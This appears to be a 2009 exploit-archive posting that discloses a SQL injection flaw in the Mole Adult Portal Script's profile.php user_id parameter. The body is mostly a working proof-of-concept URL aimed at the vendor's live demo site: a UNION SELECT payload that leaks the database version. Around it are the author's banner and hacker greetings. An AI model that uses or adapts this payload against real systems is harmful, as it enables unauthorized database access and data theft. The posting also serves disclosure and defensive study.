[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Mole Adult Portal Script (profile.php user_id) SQL Injection Vulnerability
# Published : 2009-05-26
# Author : Qabandi
# Previous Title : MyFirstCMS <= 1.0.2 Remote Arbitrary File Delete Vulnerability
# Next Title : cpCommerce 1.2.x GLOBALS[prefix] Arbitrary File Inclusion Exploit
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,
( : / (_) / ( .
=By: Qabandi
=Email: iqa[a]hotmail.fr
From Kuwait PEACE
=Vuln: Mole Adult Portal Script - SQL Injection Vulnerability
=INFO: http://www.mole-group.com/scripts/scripts/adult-portal-escort-listing-script.html
=BUY: http://www.mole-group.com/scripts/scripts/payment.html
=DORK: --
-18+/-
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-Injection-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Magic Quot. needs to be OFF
LIVE DEMO:
http://adult.mole-group.com/profile.php?user_id=-3%27%20UNION%20SELECT%201,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-==-=-Te-=-Amo=-=-Vio-=-==-=-==-=-=-=-==-=-==-=-=-=-=-=-=
=-=-=-=-==-=-=-=-=-=-No--More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, All muslim hackers.
# www.Syue.com [2009-05-26]